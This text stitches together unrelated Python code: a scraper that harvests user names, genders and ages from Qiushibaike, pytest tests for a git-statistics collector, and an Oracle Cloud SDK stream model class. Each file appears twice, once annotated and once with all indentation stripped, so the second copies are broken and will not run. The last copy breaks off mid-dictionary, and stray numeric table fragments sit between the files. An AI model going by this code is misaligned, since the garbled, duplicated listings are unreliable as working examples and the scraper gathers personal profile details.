        data_list = []
        for node in node_list:
            temp = {}
            try:
                # strip() removes invisible characters around the user name.
                temp['user'] = node.xpath('./div[1]/a[2]/h2/text()')[0].strip()
                # NOTE(review): @href on the <h2> looks suspicious — the link is
                # usually on the enclosing <a>; confirm against the live markup.
                temp['link'] = 'https://www.qiushibaike.com/' + node.xpath('./div[1]/a[2]/h2/@href')[0]
                # Gender is encoded in the div's class attribute (e.g. "womenIcon").
                temp['gender'] = node.xpath('./div[1]/div/@class')[0].split(' ')[-1].replace('Icon',' ')
                temp['age'] = node.xpath('./div[1]/div/text()')[0]
            except Exception:
                # Anonymous posts carry none of the fields above.
                # BUGFIX: the key was misspelled 'usr', making anonymous rows
                # inconsistent with the 'user' key used in the success path.
                temp['user'] = '匿名用户'
                temp['link'] = None
                temp['gender'] = None
                temp['age'] = None
            data_list.append(temp)
        return data_list

    def save_data(self, data_list):
        """Append each record as one JSON document per line."""
        for data in data_list:
            # NOTE(review): the trailing '.' makes each line invalid JSON;
            # kept byte-for-byte for output compatibility — confirm intent.
            str_data = json.dumps(data, ensure_ascii=False) + '.\n'
            self.file.write(str_data)

    def __del__(self):
        # Guarded: __del__ may run on a partially initialised instance
        # (e.g. if open() in __init__ failed).
        f = getattr(self, 'file', None)
        if f is not None and not f.closed:
            f.close()

    def run(self):
        """Crawl every listing page: fetch, parse, persist."""
        self.generate_url_list()
        for url in self.url_list:
            data = self.get_data(url)
            data_list = self.parse_data(data)
            self.save_data(data_list)
# Script entry point: crawl all pages and persist results as JSON lines.
# (Fix: dataset residue fused onto the final line made it invalid syntax.)
if __name__ == '__main__':
    qiushi = Qiushi()
    qiushi.run()
from lxml import etree
import json
class Qiushi(object):
def __init__(self):
self.url = 'https://www.qiushibaike.com/8hr/page/{}/'
self.url_list = None
self.headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36'
}
self.file = open('qiushi.json', 'w')
# 定义方法,用来生成url列表
def generate_url_list(self):
# 使用列表推导式生成url列表
# 总共 13 页 for i in range(1, 4)
self.url_list = [self.url.format(i) for i in range(1, 14)]
print(self.url_list)
# 发送请求
def get_data(self, url):
response = requests.get(url, headers=self.headers)
return response.content
# 解析数据
def parse_data(self, data):
# 实例化etree 对象
html = etree.HTML(data)
# 提取响应数据的节点列表
node_list = html.xpath('//*[contains(@id, "qiushi_tag_")]')
# print(len(node_list))
data_list = []
# 遍历节点列表
for node in node_list:
temp = {}
# 存储用户名信息
try:
# strip去除字符串边的不可见字符
temp['user'] = node.xpath('./div[1]/a[2]/h2/text()')[0].strip()
# 存储户用户的个人空间链接
temp['link'] = 'https://www.qiushibaike.com/' + node.xpath('./div[1]/a[2]/h2/@href')[0]
# 存储用户的性别,包含在div的class属性中,需要进行字符串的处理
temp['gender'] = node.xpath('./div[1]/div/@class')[0].split(' ')[-1].replace('Icon',' ')
# 存储用户的年龄
temp['age'] = node.xpath('./div[1]/div/text()')[0]
except:
temp['usr'] = '匿名用户'
temp['link'] = None
temp['gender'] = None
temp['age'] = None
data_list.append(temp)
# 返回数据
return data_list
# 保存数据
def save_data(self, data_list):
for data in data_list:
str_data = json.dumps(data, ensure_ascii=False) + '.\n'
self.file.write(str_data)
def __del__(self):
self.file.close()
def run(self):
# 构造请求url和请求头
# 生成url 列表
self.generate_url_list()
# 循环执行发送请求,传入生成的url列表中的具体页数
for url in self.url_list:
# 发送请求 获取响应
data = self.get_data(url)
# 解析数据
data_list = self.parse_data(data)
# 保存数据,如果相应数据是json字符串,想要获取指定数据的时候,一般需要转成字典,提取数据
self.save_data(data_list)
pass
if __name__ == '__main__':
qiushi = Qiushi()
qiushi.run() | 0.079642 | 0.133641 |
import json
import subprocess
from . import collectors
class CompletedProcessMock:
    """Minimal stand-in for subprocess.CompletedProcess exposing only the
    two captured streams."""

    def __init__(self, stdout='', stderr=''):
        # Store the captured output streams exactly as given.
        self.stdout, self.stderr = stdout, stderr
# Sample `git blame --line-porcelain` output: two lines, both by <NAME>.
# NOTE(review): porcelain content lines are normally tab-prefixed; whitespace
# may have been mangled in transit — do not reformat the literal.
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa

# Sample `git log --shortstat` output: two commits by the same author,
# both on 2018-06-11 (used by test_activity's aggregation expectations).
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
    """Verify the mocked subprocess.run was invoked exactly once: niced,
    shell-executed in /tmp, with both streams captured as text."""
    run_mock = subprocess.run
    assert run_mock.call_count == 1
    run_mock.assert_any_call(
        f'nice -n 20 {cmd}',
        cwd='/tmp',
        check=True,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        universal_newlines=True,
    )
def test_clone(mocker):
    """clone() shells out to `git clone <url> <name>` via the niced helper."""
    mocker.patch('subprocess.run')
    collectors.clone('/tmp', 'foo', 'bar')
    assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
    """clone() swallows subprocess failures but still issues the command."""
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    collectors.clone('/tmp', 'foo', 'bar')
    assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
    """get_timestamp() parses the author timestamp of a single revision."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('123456')
    result = {'timestamp': 123456, 'revision': 'bar'}
    assert collectors.get_timestamp('/', 'tmp', 'bar') == result
    assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
    """get_blame() counts lines per author from porcelain blame output."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(blame_text)
    result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
    """detect_move=True adds the -C -C -C -M copy/move-detection flags."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(blame_text)
    result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
    """On subprocess failure get_blame() returns an empty author map."""
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    result = {'authors': {}, 'file': 'file.txt'}
    assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
    assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
    """get_branches() lists remote branches, skipping the HEAD pointer line."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
    result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
    assert collectors.get_branches('/', 'tmp') == result
    assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
    """get_tags() parses `git show-ref --tags` into {revision, tag} pairs."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('123 b1\n456 b2')
    result = {
        'tags': [
            {'revision': '123', 'tag': 'b1'},
            {'revision': '456', 'tag': 'b2'},
        ],
        'repo': 'tmp',
    }
    assert collectors.get_tags('/', 'tmp') == result
    assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
    """On subprocess failure get_tags() returns an empty tag list."""
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    result = {'repo': 'tmp', 'tags': []}
    assert collectors.get_tags('/', 'tmp') == result
    assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
    """num_files() counts tracked files at a revision, keyed by revision id."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('f1\nf2')
    result = {'12345': {'files': 2, 'timestamp': 12345}}
    revision = {'revision': '12345', 'timestamp': 12345}
    assert collectors.num_files('/', 'tmp', revision) == result
    assert_subprocess_run('git ls-tree -r --name-only 12345')
def test_count_lines(mocker):
    """count_lines() wraps cloc's JSON output under data.lines."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
    result = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
    assert collectors.count_lines('/', 'tmp') == result
    assert_subprocess_run('cloc --vcs git --json')
def test_count_lines_on_exception(mocker):
    """On cloc failure count_lines() returns an empty lines payload."""
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('failed')
    result = {'data': {'lines': []}, 'repo': 'tmp'}
    assert collectors.count_lines('/', 'tmp') == result
    assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
    """activity() aggregates commits/insertions/deletions from shortlog_text
    (two commits, one author, same day) by author and by hour/day/week/
    month/year, plus an hour-of-week histogram and the revision list."""
    run = mocker.patch('subprocess.run')
    run.return_value = CompletedProcessMock(shortlog_text)
    result = {
        'data': {
            'authors_age': {
                '<NAME>': {
                    'days': 1,
                    'first_commit': 1528753813,
                    'last_commit': 1528753992,
                },
            },
            'by_authors': {
                '<NAME>': {
                    'at_hour': {
                        'commits': {'22': 2},
                        'deletions': {'22': 1},
                        'insertions': {'22': 4},
                    },
                    'daily': {
                        'commits': {'2018-06-11': 2},
                        'deletions': {'2018-06-11': 1},
                        'insertions': {'2018-06-11': 4},
                    },
                    'monthly': {
                        'commits': {'2018-06': 2},
                        'deletions': {'2018-06': 1},
                        'insertions': {'2018-06': 4},
                    },
                    'weekly': {
                        'commits': {'2018-24': 2},
                        'deletions': {'2018-24': 1},
                        'insertions': {'2018-24': 4},
                    },
                    'yearly': {
                        'commits': {'2018': 2},
                        'deletions': {'2018': 1},
                        'insertions': {'2018': 4},
                    },
                }
            },
            'by_time': {
                'at_hour': {
                    'commits': {'22': 2},
                    'deletions': {'22': 1},
                    'insertions': {'22': 4},
                },
                'daily': {
                    'commits': {'2018-06-11': 2},
                    'deletions': {'2018-06-11': 1},
                    'insertions': {'2018-06-11': 4},
                },
                'monthly': {
                    'commits': {'2018-06': 2},
                    'deletions': {'2018-06': 1},
                    'insertions': {'2018-06': 4},
                },
                'weekly': {
                    'commits': {'2018-24': 2},
                    'deletions': {'2018-24': 1},
                    'insertions': {'2018-24': 4},
                },
                'yearly': {
                    'commits': {'2018': 2},
                    'deletions': {'2018': 1},
                    'insertions': {'2018': 4},
                },
            },
            'hour_of_week': {'0': {'22': 2}},
        },
        'repo': 'tmp',
        'revisions': [
            {'revision': 'dcc3c393', 'timestamp': 1528753992},
            {'revision': 'a36e16b3', 'timestamp': 1528753813},
        ],
    }
    # Round-trip through JSON so dict key types match the expected literal.
    assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == result
    assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def test_summary(mocker):
    """summary() composes the repo overview from a fixed sequence of git
    commands; side_effect entries are ordered to match that call sequence."""
    run = mocker.patch('subprocess.run')
    run.side_effect = [
        # empty sha generator
        CompletedProcessMock('1234'),
        # diff --shortstat
        CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
        # shortlog -s
        CompletedProcessMock(' 93 M <NAME>'),
        # rev-list --count HEAD
        CompletedProcessMock('93'),
        # branch -r
        CompletedProcessMock('origin/master'),
        # log --reverse %at
        CompletedProcessMock('1527621944\n1527761990\n1527763244'),
        # log %at -n1
        CompletedProcessMock('1528755935'),
        # show-ref --tags
        CompletedProcessMock('refs/tags/v1'),
    ]
    result = {
        'data': [
            {'key': 'files', 'value': '98'},
            {'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
            {'key': 'authors', 'value': 1},
            {'key': 'commits', 'notes': 'master only', 'value': '93'},
            {'key': 'branches', 'value': 1},
            {'key': 'tags', 'value': 1},
            {'key': 'age', 'notes': 'active days since creation', 'value': 14}],
        'repo': 'tmp',
    }
    assert collectors.summary('/', 'tmp') == result
def test_summary_on_exception(mocker):
    """A failing show-ref (last call) degrades only the tag count to 0."""
    run = mocker.patch('subprocess.run')
    run.side_effect = [
        # empty sha generator
        CompletedProcessMock('1234'),
        # diff --shortstat
        CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
        # shortlog -s
        CompletedProcessMock(' 93 <NAME>'),
        # rev-list --count HEAD
        CompletedProcessMock('93'),
        # branch -r
        CompletedProcessMock('origin/master'),
        # log --reverse %at
        CompletedProcessMock('1527621944\n1527761990\n1527763244'),
        # log %at -n1
        CompletedProcessMock('1528755935'),
        # show-ref --tags
        Exception('refs/tags/v1'),
    ]
    result = {
        'data': [
            {'key': 'files', 'value': '98'},
            {'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
            {'key': 'authors', 'value': 1},
            {'key': 'commits', 'notes': 'master only', 'value': '93'},
            {'key': 'branches', 'value': 1},
            {'key': 'tags', 'value': 0},
            {'key': 'age', 'notes': 'active days since creation', 'value': 14}],
        'repo': 'tmp',
    }
    assert collectors.summary('/', 'tmp') == result
def test_update_repo(mocker):
    """update_repo() clones/pulls then reads HEAD metadata and the first
    commit timestamp; side_effect entries mirror that command order."""
    run = mocker.patch('subprocess.run')
    run.side_effect = [
        # clone
        CompletedProcessMock(''),
        # pull --tags
        CompletedProcessMock(''),
        # log --pretty=format:"%H %at %aN" -n1
        CompletedProcessMock('head 23456 author'),
        # log --reverse --pretty=format:"%at"
        CompletedProcessMock('12345'),
    ]
    result = {
        'HEAD': 'head',
        'author': 'author',
        'date': 23456,
        'name': 'tmp',
        'start_date': 12345,
    }
    assert collectors.update_repo('/', ['tmp', 'https://example.com']) == result
def test_update_repo_on_exception(mocker):
    """update_repo() returns an empty dict when any git command fails.

    (Fix: dataset residue fused onto the assert line made it invalid syntax.)
    """
    run = mocker.patch('subprocess.run')
    run.side_effect = Exception('')
    assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {}
import subprocess
from . import collectors
class CompletedProcessMock:
def __init__(self, stdout='', stderr=''):
self.stdout = stdout
self.stderr = stderr
blame_text = """\
aacd7f517fb0312ec73f882a345d50c6e8512405 1 1 1
author <NAME>
...
filename file.txt
line one
4cbb5a68de251bf42ecfc2b127fd2596c0d17d3f 1 2 1
author <NAME>
...
filename file.txt
line two
""" # flake8: noqa
shortlog_text = """\
1528753992 dcc3c393 M Nasimul Haque
1 file changed, 1 insertion(+), 1 deletion(-)
1528753813 a36e16b3 M Nasimul Haque
1 file changed, 3 insertions(+)
"""
def assert_subprocess_run(cmd):
assert subprocess.run.call_count == 1
subprocess.run.assert_any_call(
f'nice -n 20 {cmd}', cwd='/tmp', check=True, shell=True,
stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True
)
def test_clone(mocker):
mocker.patch('subprocess.run')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_clone_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
collectors.clone('/tmp', 'foo', 'bar')
assert_subprocess_run('git clone bar foo')
def test_get_timestamp(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123456')
result = {'timestamp': 123456, 'revision': 'bar'}
assert collectors.get_timestamp('/', 'tmp', 'bar') == result
assert_subprocess_run('git log --pretty=format:"%at" -n 1 bar')
def test_get_blame(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_blame_detect_move(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(blame_text)
result = {'authors': {'<NAME>': 2}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', True, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -C -C -C -M -w file.txt')
def test_get_blame_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'authors': {}, 'file': 'file.txt'}
assert collectors.get_blame('/', 'tmp', False, 'file.txt') == result
assert_subprocess_run('git blame --line-porcelain -w file.txt')
def test_get_branches(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('b1\nb2\nb3 HEAD')
result = {'branches': ['b1', 'b2'], 'repo': 'tmp'}
assert collectors.get_branches('/', 'tmp') == result
assert_subprocess_run('git branch -r')
def test_get_tags(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('123 b1\n456 b2')
result = {
'tags': [
{'revision': '123', 'tag': 'b1'},
{'revision': '456', 'tag': 'b2'},
],
'repo': 'tmp',
}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_get_tags_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'repo': 'tmp', 'tags': []}
assert collectors.get_tags('/', 'tmp') == result
assert_subprocess_run('git show-ref --tags')
def test_num_files(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('f1\nf2')
result = {'12345': {'files': 2, 'timestamp': 12345}}
revision = {'revision': '12345', 'timestamp': 12345}
assert collectors.num_files('/', 'tmp', revision) == result
assert_subprocess_run('git ls-tree -r --name-only 12345')
def test_count_lines(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock('{"lines": "data from cloc"}')
result = {'data': {'lines': {'lines': 'data from cloc'}}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_count_lines_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('failed')
result = {'data': {'lines': []}, 'repo': 'tmp'}
assert collectors.count_lines('/', 'tmp') == result
assert_subprocess_run('cloc --vcs git --json')
def test_activity(mocker):
run = mocker.patch('subprocess.run')
run.return_value = CompletedProcessMock(shortlog_text)
result = {
'data': {
'authors_age': {
'<NAME>': {
'days': 1,
'first_commit': 1528753813,
'last_commit': 1528753992,
},
},
'by_authors': {
'<NAME>': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
}
},
'by_time': {
'at_hour': {
'commits': {'22': 2},
'deletions': {'22': 1},
'insertions': {'22': 4},
},
'daily': {
'commits': {'2018-06-11': 2},
'deletions': {'2018-06-11': 1},
'insertions': {'2018-06-11': 4},
},
'monthly': {
'commits': {'2018-06': 2},
'deletions': {'2018-06': 1},
'insertions': {'2018-06': 4},
},
'weekly': {
'commits': {'2018-24': 2},
'deletions': {'2018-24': 1},
'insertions': {'2018-24': 4},
},
'yearly': {
'commits': {'2018': 2},
'deletions': {'2018': 1},
'insertions': {'2018': 4},
},
},
'hour_of_week': {'0': {'22': 2}},
},
'repo': 'tmp',
'revisions': [
{'revision': 'dcc3c393', 'timestamp': 1528753992},
{'revision': 'a36e16b3', 'timestamp': 1528753813},
],
}
assert json.loads(json.dumps(collectors.activity('/', 'tmp'))) == result
assert_subprocess_run('git log --shortstat --pretty=format:"%at %T %aN" HEAD')
def test_summary(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 M <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
CompletedProcessMock('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 1},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_summary_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# empty sha generator
CompletedProcessMock('1234'),
# diff --shortstat
CompletedProcessMock(' 98 files changed, 10564 insertions(+)'),
# shortlog -s
CompletedProcessMock(' 93 <NAME>'),
# rev-list --count HEAD
CompletedProcessMock('93'),
# branch -r
CompletedProcessMock('origin/master'),
# log --reverse %at
CompletedProcessMock('1527621944\n1527761990\n1527763244'),
# log %at -n1
CompletedProcessMock('1528755935'),
# show-ref --tags
Exception('refs/tags/v1'),
]
result = {
'data': [
{'key': 'files', 'value': '98'},
{'key': 'lines', 'notes': 'includes empty lines', 'value': '10564'},
{'key': 'authors', 'value': 1},
{'key': 'commits', 'notes': 'master only', 'value': '93'},
{'key': 'branches', 'value': 1},
{'key': 'tags', 'value': 0},
{'key': 'age', 'notes': 'active days since creation', 'value': 14}],
'repo': 'tmp',
}
assert collectors.summary('/', 'tmp') == result
def test_update_repo(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = [
# clone
CompletedProcessMock(''),
# pull --tags
CompletedProcessMock(''),
# log --pretty=format:"%H %at %aN" -n1
CompletedProcessMock('head 23456 author'),
# log --reverse --pretty=format:"%at"
CompletedProcessMock('12345'),
]
result = {
'HEAD': 'head',
'author': 'author',
'date': 23456,
'name': 'tmp',
'start_date': 12345,
}
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == result
def test_update_repo_on_exception(mocker):
run = mocker.patch('subprocess.run')
run.side_effect = Exception('')
assert collectors.update_repo('/', ['tmp', 'https://example.com']) == {} | 0.40028 | 0.225204 |
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateStreamDetails(object):
    """
    Object used to create a stream.

    (Fix: non-code residue fused onto the final line of __ne__ made the
    original block syntactically invalid; behavior otherwise unchanged.)
    """

    def __init__(self, **kwargs):
        """
        Initializes a new CreateStreamDetails object with values from keyword arguments.
        The following keyword arguments are supported (corresponding to the getters/setters of this class):

        :param name:
            The value to assign to the name property of this CreateStreamDetails.
        :type name: str

        :param partitions:
            The value to assign to the partitions property of this CreateStreamDetails.
        :type partitions: int

        :param compartment_id:
            The value to assign to the compartment_id property of this CreateStreamDetails.
        :type compartment_id: str

        :param stream_pool_id:
            The value to assign to the stream_pool_id property of this CreateStreamDetails.
        :type stream_pool_id: str

        :param retention_in_hours:
            The value to assign to the retention_in_hours property of this CreateStreamDetails.
        :type retention_in_hours: int

        :param freeform_tags:
            The value to assign to the freeform_tags property of this CreateStreamDetails.
        :type freeform_tags: dict(str, str)

        :param defined_tags:
            The value to assign to the defined_tags property of this CreateStreamDetails.
        :type defined_tags: dict(str, dict(str, object))
        """
        # Swagger/OpenAPI type map used by the SDK (de)serializer.
        self.swagger_types = {
            'name': 'str',
            'partitions': 'int',
            'compartment_id': 'str',
            'stream_pool_id': 'str',
            'retention_in_hours': 'int',
            'freeform_tags': 'dict(str, str)',
            'defined_tags': 'dict(str, dict(str, object))'
        }
        # Python attribute name -> JSON field name.
        self.attribute_map = {
            'name': 'name',
            'partitions': 'partitions',
            'compartment_id': 'compartmentId',
            'stream_pool_id': 'streamPoolId',
            'retention_in_hours': 'retentionInHours',
            'freeform_tags': 'freeformTags',
            'defined_tags': 'definedTags'
        }
        self._name = None
        self._partitions = None
        self._compartment_id = None
        self._stream_pool_id = None
        self._retention_in_hours = None
        self._freeform_tags = None
        self._defined_tags = None

    @property
    def name(self):
        """
        **[Required]** Gets the name of this CreateStreamDetails.
        The name of the stream. Avoid entering confidential information.
        Example: `TelemetryEvents`

        :return: The name of this CreateStreamDetails.
        :rtype: str
        """
        return self._name

    @name.setter
    def name(self, name):
        """
        Sets the name of this CreateStreamDetails.
        The name of the stream. Avoid entering confidential information.
        Example: `TelemetryEvents`

        :param name: The name of this CreateStreamDetails.
        :type: str
        """
        self._name = name

    @property
    def partitions(self):
        """
        **[Required]** Gets the partitions of this CreateStreamDetails.
        The number of partitions in the stream.

        :return: The partitions of this CreateStreamDetails.
        :rtype: int
        """
        return self._partitions

    @partitions.setter
    def partitions(self, partitions):
        """
        Sets the partitions of this CreateStreamDetails.
        The number of partitions in the stream.

        :param partitions: The partitions of this CreateStreamDetails.
        :type: int
        """
        self._partitions = partitions

    @property
    def compartment_id(self):
        """
        Gets the compartment_id of this CreateStreamDetails.
        The OCID of the compartment that contains the stream.

        :return: The compartment_id of this CreateStreamDetails.
        :rtype: str
        """
        return self._compartment_id

    @compartment_id.setter
    def compartment_id(self, compartment_id):
        """
        Sets the compartment_id of this CreateStreamDetails.
        The OCID of the compartment that contains the stream.

        :param compartment_id: The compartment_id of this CreateStreamDetails.
        :type: str
        """
        self._compartment_id = compartment_id

    @property
    def stream_pool_id(self):
        """
        Gets the stream_pool_id of this CreateStreamDetails.
        The OCID of the stream pool that contains the stream.

        :return: The stream_pool_id of this CreateStreamDetails.
        :rtype: str
        """
        return self._stream_pool_id

    @stream_pool_id.setter
    def stream_pool_id(self, stream_pool_id):
        """
        Sets the stream_pool_id of this CreateStreamDetails.
        The OCID of the stream pool that contains the stream.

        :param stream_pool_id: The stream_pool_id of this CreateStreamDetails.
        :type: str
        """
        self._stream_pool_id = stream_pool_id

    @property
    def retention_in_hours(self):
        """
        Gets the retention_in_hours of this CreateStreamDetails.
        The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
        If not specified, the stream will have a retention period of 24 hours.

        :return: The retention_in_hours of this CreateStreamDetails.
        :rtype: int
        """
        return self._retention_in_hours

    @retention_in_hours.setter
    def retention_in_hours(self, retention_in_hours):
        """
        Sets the retention_in_hours of this CreateStreamDetails.
        The retention period of the stream, in hours. Accepted values are between 24 and 168 (7 days).
        If not specified, the stream will have a retention period of 24 hours.

        :param retention_in_hours: The retention_in_hours of this CreateStreamDetails.
        :type: int
        """
        self._retention_in_hours = retention_in_hours

    @property
    def freeform_tags(self):
        """
        Gets the freeform_tags of this CreateStreamDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
        For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm

        :return: The freeform_tags of this CreateStreamDetails.
        :rtype: dict(str, str)
        """
        return self._freeform_tags

    @freeform_tags.setter
    def freeform_tags(self, freeform_tags):
        """
        Sets the freeform_tags of this CreateStreamDetails.
        Free-form tags for this resource. Each tag is a simple key-value pair that is applied with no predefined name, type, or namespace. Exists for cross-compatibility only.
        For more information, see `Resource Tags`__.
        Example: `{\"Department\": \"Finance\"}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm

        :param freeform_tags: The freeform_tags of this CreateStreamDetails.
        :type: dict(str, str)
        """
        self._freeform_tags = freeform_tags

    @property
    def defined_tags(self):
        """
        Gets the defined_tags of this CreateStreamDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm

        :return: The defined_tags of this CreateStreamDetails.
        :rtype: dict(str, dict(str, object))
        """
        return self._defined_tags

    @defined_tags.setter
    def defined_tags(self, defined_tags):
        """
        Sets the defined_tags of this CreateStreamDetails.
        Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see `Resource Tags`__.
        Example: `{\"Operations\": {\"CostCenter\": \"42\"}}`

        __ https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm

        :param defined_tags: The defined_tags of this CreateStreamDetails.
        :type: dict(str, dict(str, object))
        """
        self._defined_tags = defined_tags

    def __repr__(self):
        return formatted_flat_dict(self)

    def __eq__(self, other):
        if other is None:
            return False
        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        return not self == other
from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401
from oci.decorators import init_model_state_from_kwargs
@init_model_state_from_kwargs
class CreateStreamDetails(object):
"""
Object used to create a stream.
"""
def __init__(self, **kwargs):
"""
Initializes a new CreateStreamDetails object with values from keyword arguments.
The following keyword arguments are supported (corresponding to the getters/setters of this class):
:param name:
The value to assign to the name property of this CreateStreamDetails.
:type name: str
:param partitions:
The value to assign to the partitions property of this CreateStreamDetails.
:type partitions: int
:param compartment_id:
The value to assign to the compartment_id property of this CreateStreamDetails.
:type compartment_id: str
:param stream_pool_id:
The value to assign to the stream_pool_id property of this CreateStreamDetails.
:type stream_pool_id: str
:param retention_in_hours:
The value to assign to the retention_in_hours property of this CreateStreamDetails.
:type retention_in_hours: int
:param freeform_tags:
The value to assign to the freeform_tags property of this CreateStreamDetails.
:type freeform_tags: dict(str, str)
:param defined_tags:
The value to assign to the defined_tags property of this CreateStreamDetails.
:type defined_tags: dict(str, dict(str, object))
"""
self.swagger_types = {
'name': 'str',
'partitions': 'int',
'compartment_id': 'str',
